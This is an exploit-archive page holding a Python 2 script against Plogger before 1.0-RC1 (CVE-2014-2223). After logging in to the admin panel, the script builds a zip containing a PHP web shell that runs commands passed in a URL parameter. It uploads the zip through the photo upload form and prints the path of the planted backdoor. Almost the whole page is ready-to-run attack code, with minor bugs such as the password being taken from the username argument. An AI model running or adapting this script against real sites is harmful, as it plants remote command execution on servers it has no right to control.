Plogger 1.0-RC1 - Authenticated Arbitrary File Upload
2014-08-28 18:05:04#!/usr/bin/env python
# Exploit Title: Plogger Authenticated Arbitrary File Upload
# Date: Feb 2014
# Exploit Author: b0z
# Vendor Homepage: www.plogger.org
# Software Link: www.plogger.org/download
# Version: Plogger prior to 1.0-RC1
# CVE : 2014-2223
import hashlib
import os
import zipfile
import requests
import time
import argparse
def login(session,host,username,password):
print "[+] Log in"
session.post('http://%s/plog-admin/plog-upload.php' % host, data={
"plog_username": username,
"plog_password": password,
"action": "log_in"
})
def upload(session):
print "[+] Creating poisoned gift"
## Write the backdoor
backdoor = open(magic + '.php', 'w+', buffering = 0)
backdoor.write("<?php system($_GET['cmd']) ?>")
backdoor.close
# Add true image file to block the race condition (mandatory not null)
image = open(magic + '.png', 'w+', buffering = 0)
image.write('A')
image.close
gift = zipfile.ZipFile(magic + '.zip', mode = 'w')
gift.write(magic + '.php')
gift.write(magic + '.png')
gift.close
os.remove(magic + '.php')
os.remove(magic + '.png')
gift = open(magic + '.zip', 'rb')
files= { "userfile": ("archive.zip", gift)}
session.post('http://%s/plog-admin/plog-upload.php' % host, files=files,
data = {
"destination_radio":"existing",
"albums_menu" : "1",
"new_album_name":"",
"collections_menu":"1",
"upload":"Upload"
})
os.remove(magic + '.zip')
print '[+] Here we go ==> http://%s/plog-content/uploads/archive/%s.php' % (host,magic)
if __name__== "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--host" , help="Remote host",required=True)
parser.add_argument("--user" , help="Username",required=True)
parser.add_argument("--password" , help="Password",required=True)
args = parser.parse_args()
host = args.host
username = args.user
password = args.user
magic = hashlib.sha1(time.asctime()).hexdigest()
session = requests.session()
login(session,host,username,password)
upload(session)
Fixes
No fixesIn order to submit a new fix you need to be registered.